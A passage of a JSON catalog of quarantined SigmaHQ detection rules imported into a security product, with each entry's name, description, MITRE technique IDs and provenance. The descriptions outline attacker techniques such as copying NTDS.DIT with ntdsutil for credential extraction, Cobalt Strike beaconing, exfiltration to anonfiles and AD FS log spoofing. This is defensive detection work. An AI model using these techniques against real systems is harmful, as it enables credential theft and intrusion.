"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-2837e152-93c8-43d2-85ba-c3cd3c2ae614", "type": "detection", "name": "Powershell Local Email Collection", "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a user's local system, such as Outlook storage or cache files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-local-email-collection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" } }, { "id": "sigmahq-sigma-285b85b1-a555-4095-8652-a8a4106af63f", "type": "detection", "name": "Suspicious Rundll32 Setupapi.dll Activity", "description": "The setupapi.dll library provides the InstallHinfSection function for processing INF files. An INF file may contain instructions to create values in the registry, modify files and install drivers. 
This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rundll32-setupapi-dll-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "285b85b1-a555-4095-8652-a8a4106af63f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml" } }, { "id": "sigmahq-sigma-286b47ed-f6fe-40b3-b3a8-35129acd43bc", "type": "detection", "name": "Suspicious Access to Sensitive File Extensions - Zeek", "description": "Detects known sensitive file extensions via Zeek", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-access-to-sensitive-file-extensions-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" } }, { "id": "sigmahq-sigma-28870ae4-6a13-4616-bd1a-235a7fad7458", "type": "detection", "name": "Failed Authentications From Countries You Do Not Operate Out Of", "description": "Detect failed authentications from countries you do not operate out of.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/failed-authentications-from-countries-you-do-not-operate-out-of.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28870ae4-6a13-4616-bd1a-235a7fad7458", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" } }, { "id": "sigmahq-sigma-288a39fc-4914-4831-9ada-270e9dc12cb4", "type": "detection", "name": "Azure Active Directory Hybrid Health AD FS New Server", "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. 
There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1578" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-active-directory-hybrid-health-ad-fs-new-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "288a39fc-4914-4831-9ada-270e9dc12cb4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml" } }, { "id": "sigmahq-sigma-28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "type": "detection", "name": "Creation of WerFault.exe/Wer.dll in Unusual Folder", "description": "Detects the creation of a file named \"WerFault.exe\" or \"wer.dll\" in an uncommon folder, which could be a sign of WerFault DLL hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-werfault-exe-wer-dll-in-unusual-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" } }, { "id": "sigmahq-sigma-28ac00d6-22d9-4a3c-927f-bbd770104573", "type": "detection", "name": "RestrictedAdminMode Registry Value Tampering - ProcCreation", "description": "Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromised", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/restrictedadminmode-registry-value-tampering-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml" } }, { "id": "sigmahq-sigma-28c8f68b-098d-45af-8d43-8089f3e35403", "type": "detection", "name": "Potential Register_App.Vbs LOLScript Abuse", "description": "Detects potential abuse of the \"register_app.vbs\" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. 
Attackers can use this to install malicious DLLs for persistence and execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-register-app-vbs-lolscript-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28c8f68b-098d-45af-8d43-8089f3e35403", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml" } }, { "id": "sigmahq-sigma-28ecba0a-c743-4690-ad29-9a8f6f25a6f9", "type": "detection", "name": "Password Spray Activity", "description": "Indicates that a password spray attack has been successfully performed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-spray-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28ecba0a-c743-4690-ad29-9a8f6f25a6f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml" } }, { "id": "sigmahq-sigma-28eea407-28d7-4e42-b0be-575d5ba60b2c", "type": "detection", 
"name": "Azure AD Only Single Factor Authentication Required", "description": "Detect when users are authenticating without MFA being required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-only-single-factor-authentication-required.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28eea407-28d7-4e42-b0be-575d5ba60b2c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml" } }, { "id": "sigmahq-sigma-2953194b-e33c-4859-b9e8-05948c167447", "type": "detection", "name": "DD File Overwrite", "description": "Detects potential overwriting and deletion of a file using DD.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dd-file-overwrite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2953194b-e33c-4859-b9e8-05948c167447", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" } }, { "id": 
"sigmahq-sigma-295a59c1-7b79-4b47-a930-df12c15fc9c2", "type": "detection", "name": "Windows Registry Trust Record Modification", "description": "Alerts on trust record modification within the registry, indicating usage of macros", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-registry-trust-record-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml" } }, { "id": "sigmahq-sigma-295c9289-acee-4503-a571-8eacaef36b28", "type": "detection", "name": "Vulnerable HackSys Extreme Vulnerable Driver Load", "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-hacksys-extreme-vulnerable-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "295c9289-acee-4503-a571-8eacaef36b28", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml" } }, { "id": "sigmahq-sigma-297241f3-8108-4b3a-8c15-2dda9f844594", "type": "detection", "name": "Suspicious Invocation of Shell via Rsync", "description": "Detects the execution of a shell as sub process of \"rsync\" without the expected command line flag \"-e\" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invocation-of-shell-via-rsync.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "297241f3-8108-4b3a-8c15-2dda9f844594", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml" } }, { "id": "sigmahq-sigma-2975af79-28c4-4d2f-a951-9095f229df29", "type": "detection", "name": "Cobalt Strike DNS Beaconing", "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ 
"T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobalt-strike-dns-beaconing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2975af79-28c4-4d2f-a951-9095f229df29", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_mal_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", "type": "detection", "name": "New Connection Initiated To Potential Dead Drop Resolver Domain", "description": "Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.\nIn this context attackers leverage known websites such as \"facebook\", \"youtube\", etc. 
in order to blend in with legitimate traffic and pass through undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1102.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-connection-initiated-to-potential-dead-drop-resolver-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_dead_drop_resolvers.yml" } }, { "id": "sigmahq-sigma-2992ac4d-31e9-4325-99f2-b18a73221bb2", "type": "detection", "name": "ESXi VM Kill Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flags in order to kill/shutdown a specific VM.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.012", "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-vm-kill-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2992ac4d-31e9-4325-99f2-b18a73221bb2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml" } }, { "id": 
"sigmahq-sigma-29e1c216-6408-489d-8a06-ee9d151ef819", "type": "detection", "name": "Suspicious Mount-DiskImage", "description": "Detects suspicious use of the PowerShell \"Mount-DiskImage\" cmdlet. Adversaries may abuse container files such as disk images (.iso, .vhd) to deliver malicious payloads that may not be tagged with the Mark-of-the-Web (MOTW).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-mount-diskimage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "29e1c216-6408-489d-8a06-ee9d151ef819", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" } }, { "id": "sigmahq-sigma-29f171d7-aa47-42c7-9c7b-3c87938164d9", "type": "detection", "name": "DNS Query for Anonfiles.com Domain - DNS Client", "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-for-anonfiles-com-domain-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml" } }, { "id": "sigmahq-sigma-2a072a96-a086-49fa-bcb5-15cc5a619093", "type": "detection", "name": "Start Windows Service Via Net.EXE", "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/start-windows-service-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a072a96-a086-49fa-bcb5-15cc5a619093", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_start_service.yml" } }, { "id": "sigmahq-sigma-2a0a169d-cc66-43ce-9ae2-6e678e54e46a", "type": "detection", "name": "Registry Modification Attempt Via VBScript - PowerShell", "description": "Detects attempts to modify the registry using VBScript's CreateObject(\"Wscript.shell\") and RegWrite methods embedded within PowerShell scripts or commands.\nThreat actors commonly embed VBScript code within PowerShell to perform registry modifications, attempting to evade detection that monitors for direct registry access through traditional tools.\nThis technique can be used for persistence, defense evasion, and privilege escalation by modifying registry keys without using regedit.exe, reg.exe, or PowerShell's native registry cmdlets.", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-attempt-via-vbscript-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a0a169d-cc66-43ce-9ae2-6e678e54e46a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_vbscript_registry_modification.yml" } }, { "id": "sigmahq-sigma-2a0bb2dd-eb5f-4517-8cb9-404f8ba764a5", "type": "detection", "name": "Google Workspace Out Of Domain Email Forwarding", "description": "Detects automatic email forwarding to external domains in Google Workspace, which may indicate data leakage or misuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-out-of-domain-email-forwarding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a0bb2dd-eb5f-4517-8cb9-404f8ba764a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/login/gcp_gworkspace_out_of_domain_email_forwarding.yml" } }, { "id": "sigmahq-sigma-2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25", "type": 
"detection", "name": "Potential Provisioning Registry Key Abuse For Binary Proxy Execution", "description": "Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-provisioning-registry-key-abuse-for-binary-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml" } }, { "id": "sigmahq-sigma-2a7d64cf-81fa-4daf-ab1b-ab80b789c067", "type": "detection", "name": "Azure Firewall Rule Configuration Modified or Deleted", "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-firewall-rule-configuration-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-2a926e6a-4b81-4011-8a96-e36cc8c04302", "type": "detection", "name": "PowerShell Scripts Installed as Services - Security", "description": "Detects powershell script installed as a Service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-scripts-installed-as-services-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" } }, { "id": "sigmahq-sigma-2aa0a6b4-a865-495b-ab51-c28249537b75", "type": "detection", "name": "Startup Folder File Write", "description": "A General detection for files being created in the Windows startup directory. 
This could be an indicator of persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/startup-folder-file-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2aa0a6b4-a865-495b-ab51-c28249537b75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" } }, { "id": "sigmahq-sigma-2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", "type": "detection", "name": "Suspicious Activity in Shell Commands", "description": "Detects suspicious shell commands used in various exploit codes (see references)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-activity-in-shell-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shell_susp_commands.yml" } }, { "id": "sigmahq-sigma-2afafd61-6aae-4df4-baed-139fa1f4c345", "type": "detection", "name": "Invocation of Active Directory 
Diagnostic Tool (ntdsutil.exe)", "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT), such as creating a copy of it for offline credential extraction", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invocation-of-active-directory-diagnostic-tool-ntdsutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2afafd61-6aae-4df4-baed-139fa1f4c345", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" } }, { "id": "sigmahq-sigma-2afe6582-e149-11ea-87d0-0242ac130003", "type": "detection", "name": "Windows Defender Malware Detection History Deletion", "description": "Detects the Windows Defender event logged when the history of detected infections is deleted, which may indicate an attempt to hide evidence of earlier malware detections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-malware-detection-history-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2afe6582-e149-11ea-87d0-0242ac130003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
